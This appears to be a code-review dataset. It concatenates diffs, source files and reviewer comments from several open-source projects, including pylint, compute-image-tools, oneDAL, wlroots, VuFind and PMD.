self._check_iterable(node.value) @check_messages("not-an-iterable", "not-a-mapping") def visit_call(self, node): for stararg in node.starargs: 
self._check_iterable(stararg.value) for kwarg in node.kwargs: self._check_mapping(kwarg.value) @check_messages("not-an-iterable") def visit_listcomp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_dictcomp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_setcomp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_generatorexp(self, node): for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("await-outside-async") def visit_await(self, node: nodes.Await) -> None: self._check_await_outside_coroutine(node) def _check_await_outside_coroutine(self, node: nodes.Await) -> None: node_scope = node.scope() while not isinstance(node_scope, nodes.Module): if isinstance(node_scope, nodes.AsyncFunctionDef): return if isinstance(node_scope, nodes.FunctionDef): break node_scope = node_scope.parent.scope() self.add_message("await-outside-async", node=node) def register(linter): """required method to auto register this checker""" linter.register_checker(TypeChecker(linter)) linter.register_checker(IterableChecker(linter))
1
15,293
`PY310` should probably be imported from `pylint.const`
PyCQA-pylint
py
@@ -37,6 +37,14 @@ func (w workflowLoggable) GetValue(key string) string { return w.wf.GetSerialConsoleOutputValue(key) } +func (w workflowLoggable) GetValueAsBool(key string) bool { + v, err := strconv.ParseBool(w.wf.GetSerialConsoleOutputValue(key)) + if err != nil { + return false + } + return v +} + func (w workflowLoggable) GetValueAsInt64Slice(key string) []int64 { return getInt64Values(w.wf.GetSerialConsoleOutputValue(key)) }
1
// Copyright 2020 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package service import ( "strconv" "strings" "github.com/GoogleCloudPlatform/compute-image-tools/daisy" ) // NewLoggableFromWorkflow provides a Loggable from a daisy workflow. func NewLoggableFromWorkflow(wf *daisy.Workflow) Loggable { if wf == nil { return nil } return workflowLoggable{wf: wf} } type workflowLoggable struct { wf *daisy.Workflow } func (w workflowLoggable) GetValue(key string) string { return w.wf.GetSerialConsoleOutputValue(key) } func (w workflowLoggable) GetValueAsInt64Slice(key string) []int64 { return getInt64Values(w.wf.GetSerialConsoleOutputValue(key)) } func (w workflowLoggable) ReadSerialPortLogs() []string { if w.wf.Logger != nil { logs := w.wf.Logger.ReadSerialPortLogs() view := make([]string, len(logs)) copy(view, logs) return view } return nil } func getInt64Values(s string) []int64 { strs := strings.Split(s, ",") var r []int64 for _, str := range strs { i, err := strconv.ParseInt(str, 0, 64) if err == nil { r = append(r, i) } } return r }
1
12,150
Can we propagate this error up the stack?
GoogleCloudPlatform-compute-image-tools
go
@@ -83,7 +83,12 @@ public: const table& result_values) { auto reference = compute_reference(sigma, x_data, y_data); const double tol = te::get_tolerance<Float>(1e-4, 1e-9); - const double diff = la::l_inf_norm(reference, la::matrix<double>::wrap(result_values)); + const table reference_table = dal::detail::homogen_table_builder{} + .reset(reference.get_array(), + reference.get_row_count(), + reference.get_column_count()) + .build(); + const double diff = te::abs_error(reference_table, result_values); CHECK(diff < tol); }
1
/******************************************************************************* * Copyright 2021 Intel Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *******************************************************************************/ #include "oneapi/dal/algo/rbf_kernel/compute.hpp" #include "oneapi/dal/test/engine/common.hpp" #include "oneapi/dal/test/engine/fixtures.hpp" #include "oneapi/dal/test/engine/dataframe.hpp" #include "oneapi/dal/test/engine/math.hpp" namespace oneapi::dal::rbf_kernel::test { namespace te = dal::test::engine; namespace la = te::linalg; template <typename TestType> class rbf_kernel_batch_test : public te::algo_fixture { public: using Float = std::tuple_element_t<0, TestType>; using Method = std::tuple_element_t<1, TestType>; auto get_descriptor(double sigma) const { return rbf_kernel::descriptor<Float, Method>{}.set_sigma(sigma); } te::table_id get_homogen_table_id() const { return te::table_id::homogen<Float>(); } void general_checks(const te::dataframe& x_data, const te::dataframe& y_data, double sigma, const te::table_id& x_data_table_id, const te::table_id& y_data_table_id) { CAPTURE(sigma); const table x = x_data.get_table(this->get_policy(), x_data_table_id); const table y = y_data.get_table(this->get_policy(), y_data_table_id); INFO("create descriptor") const auto rbf_kernel_desc = get_descriptor(sigma); INFO("run compute"); const auto compute_result = this->compute(rbf_kernel_desc, x, y); check_compute_result(sigma, x, y, 
compute_result); } void check_compute_result(double sigma, const table& x_data, const table& y_data, const rbf_kernel::compute_result<>& result) { const auto result_values = result.get_values(); SECTION("result values table shape is expected") { REQUIRE(result_values.get_row_count() == x_data.get_row_count()); REQUIRE(result_values.get_column_count() == y_data.get_row_count()); } SECTION("there is no NaN in result values table") { REQUIRE(te::has_no_nans(result_values)); } SECTION("result values are expected") { check_result_values(sigma, x_data, y_data, result_values); } } void check_result_values(double sigma, const table& x_data, const table& y_data, const table& result_values) { auto reference = compute_reference(sigma, x_data, y_data); const double tol = te::get_tolerance<Float>(1e-4, 1e-9); const double diff = la::l_inf_norm(reference, la::matrix<double>::wrap(result_values)); CHECK(diff < tol); } la::matrix<double> compute_reference(double sigma, const table& x_data, const table& y_data) { const auto x_data_matrix = la::matrix<double>::wrap(x_data); const auto y_data_matrix = la::matrix<double>::wrap(y_data); const auto row_count_x = x_data_matrix.get_row_count(); const auto row_count_y = y_data_matrix.get_row_count(); const auto column_count = x_data_matrix.get_column_count(); auto reference = la::matrix<double>::full({ row_count_x, row_count_y }, 0.0); const double inv_sigma = 1.0 / (sigma * sigma); for (std::int64_t i = 0; i < row_count_x; i++) for (std::int64_t j = 0; j < row_count_y; j++) { for (std::int64_t k = 0; k < column_count; k++) { double diff = x_data_matrix.get(i, k) - y_data_matrix.get(j, k); reference.set(i, j) += diff * diff; } reference.set(i, j) = std::exp(-0.5 * inv_sigma * reference.get(i, j)); } return reference; } }; using rbf_kernel_types = COMBINE_TYPES((float, double), (rbf_kernel::method::dense)); TEMPLATE_LIST_TEST_M(rbf_kernel_batch_test, "rbf_kernel common flow", "[rbf_kernel][integration][batch]", rbf_kernel_types) { const 
te::dataframe x_data = GENERATE_DATAFRAME(te::dataframe_builder{ 50, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 100, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 250, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 1100, 50 }.fill_uniform(-3, 3, 7777)); // Homogen floating point type is the same as algorithm's floating point type const auto x_data_table_id = this->get_homogen_table_id(); const te::dataframe y_data = GENERATE_DATAFRAME(te::dataframe_builder{ 50, 50 }.fill_uniform(-3, 3, 7777), te::dataframe_builder{ 100, 50 }.fill_uniform(-3, 3, 8888), te::dataframe_builder{ 200, 50 }.fill_uniform(-3, 3, 8888), te::dataframe_builder{ 1000, 50 }.fill_uniform(-3, 3, 8888)); // Homogen floating point type is the same as algorithm's floating point type const auto y_data_table_id = this->get_homogen_table_id(); const double sigma = GENERATE_COPY(0.8, 1.0, 5.0); this->general_checks(x_data, y_data, sigma, x_data_table_id, y_data_table_id); } TEMPLATE_LIST_TEST_M(rbf_kernel_batch_test, "rbf_kernel compute one element matrix", "[rbf_kernel][integration][batch]", rbf_kernel_types) { const te::dataframe x_data = GENERATE_DATAFRAME(te::dataframe_builder{ 1, 1 }.fill_uniform(-3, 3, 7777)); // Homogen floating point type is the same as algorithm's floating point type const auto x_data_table_id = this->get_homogen_table_id(); const te::dataframe y_data = GENERATE_DATAFRAME(te::dataframe_builder{ 1, 1 }.fill_uniform(-3, 3, 8888)); // Homogen floating point type is the same as algorithm's floating point type const auto y_data_table_id = this->get_homogen_table_id(); const double sigma = GENERATE_COPY(0.8, 1.0, 5.0); this->general_checks(x_data, y_data, sigma, x_data_table_id, y_data_table_id); } } // namespace oneapi::dal::rbf_kernel::test
1
27,588
Why reference is converted to table?
oneapi-src-oneDAL
cpp
@@ -203,16 +203,15 @@ struct roots_view *view_at(struct roots_desktop *desktop, double lx, double ly, struct roots_desktop *desktop_create(struct roots_server *server, struct roots_config *config) { struct roots_desktop *desktop = calloc(1, sizeof(struct roots_desktop)); + assert(desktop); wlr_log(L_DEBUG, "Initializing roots desktop"); assert(desktop->views = list_create()); wl_list_init(&desktop->outputs); - wl_list_init(&desktop->output_add.link); - desktop->output_add.notify = output_add_notify; - wl_list_init(&desktop->output_remove.link); - desktop->output_remove.notify = output_remove_notify; + desktop->output_add.notify = output_add_notify; wl_signal_add(&server->backend->events.output_add, &desktop->output_add); + desktop->output_remove.notify = output_remove_notify; wl_signal_add(&server->backend->events.output_remove, &desktop->output_remove);
1
#define _POSIX_C_SOURCE 199309L #include <assert.h> #include <time.h> #include <stdlib.h> #include <math.h> #include <wlr/types/wlr_box.h> #include <wlr/types/wlr_compositor.h> #include <wlr/types/wlr_cursor.h> #include <wlr/types/wlr_gamma_control.h> #include <wlr/types/wlr_output_layout.h> #include <wlr/types/wlr_wl_shell.h> #include <wlr/types/wlr_xdg_shell_v6.h> #include <wlr/util/log.h> #include "rootston/desktop.h" #include "rootston/server.h" void view_destroy(struct roots_view *view) { struct roots_desktop *desktop = view->desktop; struct roots_input *input = desktop->server->input; if (input->active_view == view) { input->active_view = NULL; input->mode = ROOTS_CURSOR_PASSTHROUGH; } if (input->last_active_view == view) { input->last_active_view = NULL; } for (size_t i = 0; i < desktop->views->length; ++i) { struct roots_view *_view = desktop->views->items[i]; if (view == _view) { list_del(desktop->views, i); break; } } free(view); } void view_get_size(struct roots_view *view, struct wlr_box *box) { if (view->get_size) { view->get_size(view, box); return; } box->x = box->y = 0; box->width = view->wlr_surface->current->width; box->height = view->wlr_surface->current->height; } void view_set_position(struct roots_view *view, double x, double y) { if (view->set_position) { view->set_position(view, x, y); return; } view->x = x; view->y = y; } void view_activate(struct roots_view *view, bool activate) { if (view->activate) { view->activate(view, activate); } } void view_resize(struct roots_view *view, uint32_t width, uint32_t height) { if (view->resize) { view->resize(view, width, height); } } void view_close(struct roots_view *view) { if (view->close) { view->close(view); } } bool view_center(struct roots_view *view) { struct wlr_box size; view_get_size(view, &size); struct roots_desktop *desktop = view->desktop; struct wlr_cursor *cursor = desktop->server->input->cursor; struct wlr_output *output = wlr_output_layout_output_at(desktop->layout, cursor->x, 
cursor->y); if (!output) { output = wlr_output_layout_get_center_output(desktop->layout); } if (!output) { // empty layout return false; } const struct wlr_output_layout_output *l_output = wlr_output_layout_get(desktop->layout, output); int width, height; wlr_output_effective_resolution(output, &width, &height); view->x = (double)(width - size.width) / 2 + l_output->x; view->y = (double)(height - size.height) / 2 + l_output->y; return true; } void view_initialize(struct roots_view *view) { view_center(view); struct roots_input *input = view->desktop->server->input; set_view_focus(input, view->desktop, view); wlr_seat_keyboard_notify_enter(input->wl_seat, view->wlr_surface); } struct roots_view *view_at(struct roots_desktop *desktop, double lx, double ly, struct wlr_surface **surface, double *sx, double *sy) { for (int i = desktop->views->length - 1; i >= 0; --i) { struct roots_view *view = desktop->views->items[i]; if (view->type == ROOTS_WL_SHELL_VIEW && view->wl_shell_surface->state == WLR_WL_SHELL_SURFACE_STATE_POPUP) { continue; } double view_sx = lx - view->x; double view_sy = ly - view->y; struct wlr_box box = { .x = 0, .y = 0, .width = view->wlr_surface->current->buffer_width, .height = view->wlr_surface->current->buffer_height, }; if (view->rotation != 0.0) { // Coordinates relative to the center of the view double ox = view_sx - (double)box.width/2, oy = view_sy - (double)box.height/2; // Rotated coordinates double rx = cos(view->rotation)*ox - sin(view->rotation)*oy, ry = cos(view->rotation)*oy + sin(view->rotation)*ox; view_sx = rx + (double)box.width/2; view_sy = ry + (double)box.height/2; } if (view->type == ROOTS_XDG_SHELL_V6_VIEW) { // TODO: test if this works with rotated views double popup_sx, popup_sy; struct wlr_xdg_surface_v6 *popup = wlr_xdg_surface_v6_popup_at(view->xdg_surface_v6, view_sx, view_sy, &popup_sx, &popup_sy); if (popup) { *sx = view_sx - popup_sx; *sy = view_sy - popup_sy; *surface = popup->surface; return view; } } if (view->type 
== ROOTS_WL_SHELL_VIEW) { // TODO: test if this works with rotated views double popup_sx, popup_sy; struct wlr_wl_shell_surface *popup = wlr_wl_shell_surface_popup_at(view->wl_shell_surface, view_sx, view_sy, &popup_sx, &popup_sy); if (popup) { *sx = view_sx - popup_sx; *sy = view_sy - popup_sy; *surface = popup->surface; return view; } } double sub_x, sub_y; struct wlr_subsurface *subsurface = wlr_surface_subsurface_at(view->wlr_surface, view_sx, view_sy, &sub_x, &sub_y); if (subsurface) { *sx = view_sx - sub_x; *sy = view_sy - sub_y; *surface = subsurface->surface; return view; } if (wlr_box_contains_point(&box, view_sx, view_sy) && pixman_region32_contains_point( &view->wlr_surface->current->input, view_sx, view_sy, NULL)) { *sx = view_sx; *sy = view_sy; *surface = view->wlr_surface; return view; } } return NULL; } struct roots_desktop *desktop_create(struct roots_server *server, struct roots_config *config) { struct roots_desktop *desktop = calloc(1, sizeof(struct roots_desktop)); wlr_log(L_DEBUG, "Initializing roots desktop"); assert(desktop->views = list_create()); wl_list_init(&desktop->outputs); wl_list_init(&desktop->output_add.link); desktop->output_add.notify = output_add_notify; wl_list_init(&desktop->output_remove.link); desktop->output_remove.notify = output_remove_notify; wl_signal_add(&server->backend->events.output_add, &desktop->output_add); wl_signal_add(&server->backend->events.output_remove, &desktop->output_remove); desktop->server = server; desktop->config = config; desktop->layout = wlr_output_layout_create(); desktop->compositor = wlr_compositor_create(server->wl_display, server->renderer); desktop->xdg_shell_v6 = wlr_xdg_shell_v6_create(server->wl_display); wl_signal_add(&desktop->xdg_shell_v6->events.new_surface, &desktop->xdg_shell_v6_surface); desktop->xdg_shell_v6_surface.notify = handle_xdg_shell_v6_surface; desktop->wl_shell = wlr_wl_shell_create(server->wl_display); wl_signal_add(&desktop->wl_shell->events.new_surface, 
&desktop->wl_shell_surface); desktop->wl_shell_surface.notify = handle_wl_shell_surface; #ifdef HAS_XWAYLAND if (config->xwayland) { desktop->xwayland = wlr_xwayland_create(server->wl_display, desktop->compositor); wl_signal_add(&desktop->xwayland->events.new_surface, &desktop->xwayland_surface); desktop->xwayland_surface.notify = handle_xwayland_surface; } #endif desktop->gamma_control_manager = wlr_gamma_control_manager_create( server->wl_display); desktop->screenshooter = wlr_screenshooter_create(server->wl_display, server->renderer); return desktop; } void desktop_destroy(struct roots_desktop *desktop) { // TODO }
1
8,625
You shouldn't use assert for runtime errors.
swaywm-wlroots
c
@@ -15,6 +15,7 @@ return array( 'vendor/bootstrap.min.js', 'vendor/bootstrap-accessibility.min.js', 'vendor/validator.min.js', + 'vendor/form-attr-polyfill.js', // input[form] polyfill, cannot load conditionally, since we need all versions of IE 'autocomplete.js', 'common.js', 'lightbox.js',
1
<?php return array( 'extends' => 'root', 'css' => array( //'vendor/bootstrap.min.css', //'vendor/bootstrap-accessibility.css', //'vendor/font-awesome.min.css', //'bootstrap-custom.css', 'compiled.css', 'print.css:print', ), 'js' => array( 'vendor/base64.js:lt IE 10', // btoa polyfill 'vendor/jquery.min.js', 'vendor/bootstrap.min.js', 'vendor/bootstrap-accessibility.min.js', 'vendor/validator.min.js', 'autocomplete.js', 'common.js', 'lightbox.js', ), 'less' => array( 'active' => false, 'compiled.less' ), 'favicon' => 'vufind-favicon.ico', 'helpers' => array( 'factories' => array( 'flashmessages' => 'VuFind\View\Helper\Bootstrap3\Factory::getFlashmessages', 'layoutclass' => 'VuFind\View\Helper\Bootstrap3\Factory::getLayoutClass', 'recaptcha' => 'VuFind\View\Helper\Bootstrap3\Factory::getRecaptcha', ), 'invokables' => array( 'highlight' => 'VuFind\View\Helper\Bootstrap3\Highlight', 'search' => 'VuFind\View\Helper\Bootstrap3\Search' ) ) );
1
24,447
Does this really belong in the vendor directory if you wrote it? At very least, should it get its own repo somewhere in addition to being dropped here?
vufind-org-vufind
php
@@ -78,7 +78,7 @@ public class PMDTaskTest { String actual = IOUtils.toString(in, StandardCharsets.UTF_8); // remove any trailing newline actual = actual.replaceAll("\n|\r", ""); - Assert.assertEquals("sample.dummy:0:\tTest Rule 2", actual); + Assert.assertEquals("sample.dummy:0:\tTest Rule 2:\tSampleXPathRule", actual); } } }
1
/** * BSD-style license; for more info see http://pmd.sourceforge.net/license.html */ package net.sourceforge.pmd.ant; import static org.junit.Assert.fail; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.commons.io.IOUtils; import org.apache.tools.ant.BuildException; import org.apache.tools.ant.BuildFileRule; import org.junit.Assert; import org.junit.Before; import org.junit.Rule; import org.junit.Test; public class PMDTaskTest { @Rule public final BuildFileRule buildRule = new BuildFileRule(); @Before public void setUp() { buildRule.configureProject("src/test/resources/net/sourceforge/pmd/ant/xml/pmdtasktest.xml"); } @Test public void testFormatterWithNoToFileAttribute() { try { buildRule.executeTarget("testFormatterWithNoToFileAttribute"); fail("This should throw an exception"); } catch (BuildException ex) { Assert.assertEquals("toFile or toConsole needs to be specified in Formatter", ex.getMessage()); } } @Test public void testNoRuleSets() { try { buildRule.executeTarget("testNoRuleSets"); fail("This should throw an exception"); } catch (BuildException ex) { Assert.assertEquals("No rulesets specified", ex.getMessage()); } } @Test public void testBasic() { buildRule.executeTarget("testBasic"); } @Test public void testInvalidLanguageVersion() { try { buildRule.executeTarget("testInvalidLanguageVersion"); Assert.assertEquals( "The following language is not supported:<sourceLanguage name=\"java\" version=\"42\" />.", buildRule.getLog()); fail("This should throw an exception"); } catch (BuildException ex) { Assert.assertEquals( "The following language is not supported:<sourceLanguage name=\"java\" version=\"42\" />.", ex.getMessage()); } } @Test public void testWithShortFilenames() throws FileNotFoundException, IOException { buildRule.executeTarget("testWithShortFilenames"); try (InputStream in = new 
FileInputStream("target/pmd-ant-test.txt")) { String actual = IOUtils.toString(in, StandardCharsets.UTF_8); // remove any trailing newline actual = actual.replaceAll("\n|\r", ""); Assert.assertEquals("sample.dummy:0:\tTest Rule 2", actual); } } }
1
18,124
I think it would be better to place the rule name before the message. Messages are of varying lengths and the rule names will end up misaligned
pmd-pmd
java
@@ -1719,7 +1719,12 @@ class ComparisonChecker(_BasicChecker): 'Used when comparing an object to a literal, which is usually ' 'what you do not want to do, since you can compare to a different ' 'literal than what was expected altogether.'), - } + 'R0124': ('Logical tautology in comparison - %s', + 'logical-tautology', + 'Used when something is compared against itself.', + ), + + } def _check_singleton_comparison(self, singleton, root_node, negative_check=False): if singleton.value is True:
1
# -*- coding: utf-8 -*- # Copyright (c) 2006-2016 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2010 Daniel Harding <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2013-2017 Claudiu Popa <[email protected]> # Copyright (c) 2014 Brett Cannon <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Nick Bastin <[email protected]> # Copyright (c) 2015 Michael Kefeder <[email protected]> # Copyright (c) 2015 Dmitry Pribysh <[email protected]> # Copyright (c) 2015 Stephane Wirtel <[email protected]> # Copyright (c) 2015 Cosmin Poieana <[email protected]> # Copyright (c) 2015 Florian Bruhin <[email protected]> # Copyright (c) 2015 Radu Ciorba <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016-2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2016 Glenn Matthews <[email protected]> # Copyright (c) 2016 Elias Dorneles <[email protected]> # Copyright (c) 2016 Ashley Whetter <[email protected]> # Copyright (c) 2016 Yannack <[email protected]> # Copyright (c) 2016 Jakub Wilk <[email protected]> # Copyright (c) 2016 Alex Jurkiewicz <[email protected]> # Copyright (c) 2017 ttenhoeve-aa <[email protected]> # Copyright (c) 2017 hippo91 <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/master/COPYING """basic checker for Python code""" import builtins import collections import itertools import sys import re import astroid import astroid.bases import astroid.scoped_nodes from pylint import checkers from pylint import exceptions from pylint import interfaces from pylint.checkers import utils from pylint import reporters from pylint.checkers.utils import get_node_last_lineno from pylint.reporters.ureports import nodes as reporter_nodes import pylint.utils as lint_utils class NamingStyle(object): # It may seem counterintuitive that single 
naming style # has multiple "accepted" forms of regular expressions, # but we need to special-case stuff like dunder names # in method names. CLASS_NAME_RGX = None MOD_NAME_RGX = None CONST_NAME_RGX = None COMP_VAR_RGX = None DEFAULT_NAME_RGX = None CLASS_ATTRIBUTE_RGX = None @classmethod def get_regex(cls, name_type): return { 'module': cls.MOD_NAME_RGX, 'const': cls.CONST_NAME_RGX, 'class': cls.CLASS_NAME_RGX, 'function': cls.DEFAULT_NAME_RGX, 'method': cls.DEFAULT_NAME_RGX, 'attr': cls.DEFAULT_NAME_RGX, 'argument': cls.DEFAULT_NAME_RGX, 'variable': cls.DEFAULT_NAME_RGX, 'class_attribute': cls.CLASS_ATTRIBUTE_RGX, 'inlinevar': cls.COMP_VAR_RGX, }[name_type] class SnakeCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[a-z_][a-z0-9_]+$') MOD_NAME_RGX = re.compile('([a-z_][a-z0-9_]*)$') CONST_NAME_RGX = re.compile('(([a-z_][a-z0-9_]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[a-z_][a-z0-9_]*$') DEFAULT_NAME_RGX = re.compile('(([a-z_][a-z0-9_]{2,30})|(_[a-z0-9_]*)|(__[a-z][a-z0-9_]+__))$') CLASS_ATTRIBUTE_RGX = re.compile(r'(([a-z_][a-z0-9_]{2,30}|(__.*__)))$') class CamelCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[a-z_][a-zA-Z0-9]+$') MOD_NAME_RGX = re.compile('([a-z_][a-zA-Z0-9]*)$') CONST_NAME_RGX = re.compile('(([a-z_][A-Za-z0-9]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[a-z_][A-Za-z0-9]*$') DEFAULT_NAME_RGX = re.compile('(([a-z_][a-zA-Z0-9]{2,30})|(__[a-z][a-zA-Z0-9_]+__))$') CLASS_ATTRIBUTE_RGX = re.compile(r'([a-z_][A-Za-z0-9]{2,30}|(__.*__))$') class PascalCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[A-Z_][a-zA-Z0-9]+$') MOD_NAME_RGX = re.compile('[A-Z_][a-zA-Z0-9]+$') CONST_NAME_RGX = re.compile('(([A-Z_][A-Za-z0-9]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[A-Z_][a-zA-Z0-9]+$') DEFAULT_NAME_RGX = re.compile('[A-Z_][a-zA-Z0-9]{2,30}$|(__[a-z][a-zA-Z0-9_]+__)$') CLASS_ATTRIBUTE_RGX = re.compile('[A-Z_][a-zA-Z0-9]{2,30}$') class UpperCaseStyle(NamingStyle): CLASS_NAME_RGX = re.compile('[A-Z_][A-Z0-9_]+$') MOD_NAME_RGX = 
re.compile('[A-Z_][A-Z0-9_]+$') CONST_NAME_RGX = re.compile('(([A-Z_][A-Z0-9_]*)|(__.*__))$') COMP_VAR_RGX = re.compile('[A-Z_][A-Z0-9_]+$') DEFAULT_NAME_RGX = re.compile('([A-Z_][A-Z0-9_]{2,30})|(__[a-z][a-zA-Z0-9_]+__)$') CLASS_ATTRIBUTE_RGX = re.compile('[A-Z_][A-Z0-9_]{2,30}$') class AnyStyle(NamingStyle): @classmethod def get_regex(cls, name_type): return re.compile('.*') NAMING_STYLES = {'snake_case': SnakeCaseStyle, 'camelCase': CamelCaseStyle, 'PascalCase': PascalCaseStyle, 'UPPER_CASE': UpperCaseStyle, 'any': AnyStyle} # do not require a doc string on private/system methods NO_REQUIRED_DOC_RGX = re.compile('^_') REVERSED_PROTOCOL_METHOD = '__reversed__' SEQUENCE_PROTOCOL_METHODS = ('__getitem__', '__len__') REVERSED_METHODS = (SEQUENCE_PROTOCOL_METHODS, (REVERSED_PROTOCOL_METHOD, )) TYPECHECK_COMPARISON_OPERATORS = frozenset(('is', 'is not', '==', '!=', 'in', 'not in')) LITERAL_NODE_TYPES = (astroid.Const, astroid.Dict, astroid.List, astroid.Set) UNITTEST_CASE = 'unittest.case' BUILTINS = builtins.__name__ TYPE_QNAME = "%s.type" % BUILTINS PY33 = sys.version_info >= (3, 3) PY3K = sys.version_info >= (3, 0) PY35 = sys.version_info >= (3, 5) # Name categories that are always consistent with all naming conventions. EXEMPT_NAME_CATEGORIES = {'exempt', 'ignore'} # A mapping from builtin-qname -> symbol, to be used when generating messages # about dangerous default values as arguments DEFAULT_ARGUMENT_SYMBOLS = dict( zip(['.'.join([BUILTINS, x]) for x in ('set', 'dict', 'list')], ['set()', '{}', '[]']) ) REVERSED_COMPS = {'<': '>', '<=': '>=', '>': '<', '>=': '<='} def _redefines_import(node): """ Detect that the given node (AssignName) is inside an exception handler and redefines an import from the tryexcept body. Returns True if the node redefines an import, False otherwise. 
""" current = node while current and not isinstance(current.parent, astroid.ExceptHandler): current = current.parent if not current or not utils.error_of_type(current.parent, ImportError): return False try_block = current.parent.parent for import_node in try_block.nodes_of_class((astroid.ImportFrom, astroid.Import)): for name, alias in import_node.names: if alias: if alias == node.name: return True elif name == node.name: return True return False def in_loop(node): """return True if the node is inside a kind of for loop""" parent = node.parent while parent is not None: if isinstance(parent, (astroid.For, astroid.ListComp, astroid.SetComp, astroid.DictComp, astroid.GeneratorExp)): return True parent = parent.parent return False def in_nested_list(nested_list, obj): """return true if the object is an element of <nested_list> or of a nested list """ for elmt in nested_list: if isinstance(elmt, (list, tuple)): if in_nested_list(elmt, obj): return True elif elmt == obj: return True return False def _get_break_loop_node(break_node): """ Returns the loop node that holds the break node in arguments. Args: break_node (astroid.Break): the break node of interest. Returns: astroid.For or astroid.While: the loop node holding the break node. """ loop_nodes = (astroid.For, astroid.While) parent = break_node.parent while not isinstance(parent, loop_nodes) or break_node in getattr(parent, 'orelse', []): parent = parent.parent if parent is None: break return parent def _loop_exits_early(loop): """ Returns true if a loop may ends up in a break statement. Args: loop (astroid.For, astroid.While): the loop node inspected. Returns: bool: True if the loop may ends up in a break statement, False otherwise. 
""" loop_nodes = (astroid.For, astroid.While) definition_nodes = (astroid.FunctionDef, astroid.ClassDef) inner_loop_nodes = [ _node for _node in loop.nodes_of_class(loop_nodes, skip_klass=definition_nodes) if _node != loop ] return any( _node for _node in loop.nodes_of_class(astroid.Break, skip_klass=definition_nodes) if _get_break_loop_node(_node) not in inner_loop_nodes ) def _is_multi_naming_match(match, node_type, confidence): return (match is not None and match.lastgroup is not None and match.lastgroup not in EXEMPT_NAME_CATEGORIES and (node_type != 'method' or confidence != interfaces.INFERENCE_FAILURE)) if sys.version_info < (3, 0): BUILTIN_PROPERTY = '__builtin__.property' else: BUILTIN_PROPERTY = 'builtins.property' def _get_properties(config): """Returns a tuple of property classes and names. Property classes are fully qualified, such as 'abc.abstractproperty' and property names are the actual names, such as 'abstract_property'. """ property_classes = set((BUILTIN_PROPERTY,)) property_names = set() # Not returning 'property', it has its own check. if config is not None: property_classes.update(config.property_classes) property_names.update((prop.rsplit('.', 1)[-1] for prop in config.property_classes)) return property_classes, property_names def _determine_function_name_type(node, config=None): """Determine the name type whose regex the a function's name should match. :param node: A function node. :type node: astroid.node_classes.NodeNG :param config: Configuration from which to pull additional property classes. :type config: :class:`optparse.Values` :returns: One of ('function', 'method', 'attr') :rtype: str """ property_classes, property_names = _get_properties(config) if not node.is_method(): return 'function' if node.decorators: decorators = node.decorators.nodes else: decorators = [] for decorator in decorators: # If the function is a property (decorated with @property # or @abc.abstractproperty), the name type is 'attr'. 
# NOTE(review): this chunk opens mid-function — the enclosing helper's `def`
# line (it iterates `node.decorators.nodes`; presumably
# `_determine_function_name_type`) is above this view. Fragment kept as-is.
            # A decorator inferring to a known property class means the
            # function behaves like an attribute.
            if (isinstance(decorator, astroid.Name) or
                    (isinstance(decorator, astroid.Attribute) and
                     decorator.attrname in property_names)):
                infered = utils.safe_infer(decorator)
                if infered and infered.qname() in property_classes:
                    return 'attr'
            # If the function is decorated using the prop_method.{setter,getter}
            # form, treat it like an attribute as well.
            elif (isinstance(decorator, astroid.Attribute) and
                  decorator.attrname in ('setter', 'deleter')):
                return 'attr'
    return 'method'


def _has_abstract_methods(node):
    """
    Determine if the given `node` has abstract methods.

    The methods should be made abstract by decorating them
    with `abc` decorators.
    """
    return len(utils.unimplemented_abstract_methods(node)) > 0


def report_by_type_stats(sect, stats, old_stats):
    """make a report of

    * percentage of different types documented
    * percentage of different types with a bad name
    """
    # percentage of different types documented and/or with a bad name
    nice_stats = {}
    for node_type in ('module', 'class', 'method', 'function'):
        try:
            total = stats[node_type]
        except KeyError:
            raise exceptions.EmptyReportError()
        nice_stats[node_type] = {}
        if total != 0:
            try:
                documented = total - stats['undocumented_'+node_type]
                percent = (documented * 100.) / total
                nice_stats[node_type]['percent_documented'] = '%.2f' % percent
            except KeyError:
                # 'NC' = not computable for this run
                nice_stats[node_type]['percent_documented'] = 'NC'
            try:
                percent = (stats['badname_'+node_type] * 100.) / total
                nice_stats[node_type]['percent_badname'] = '%.2f' % percent
            except KeyError:
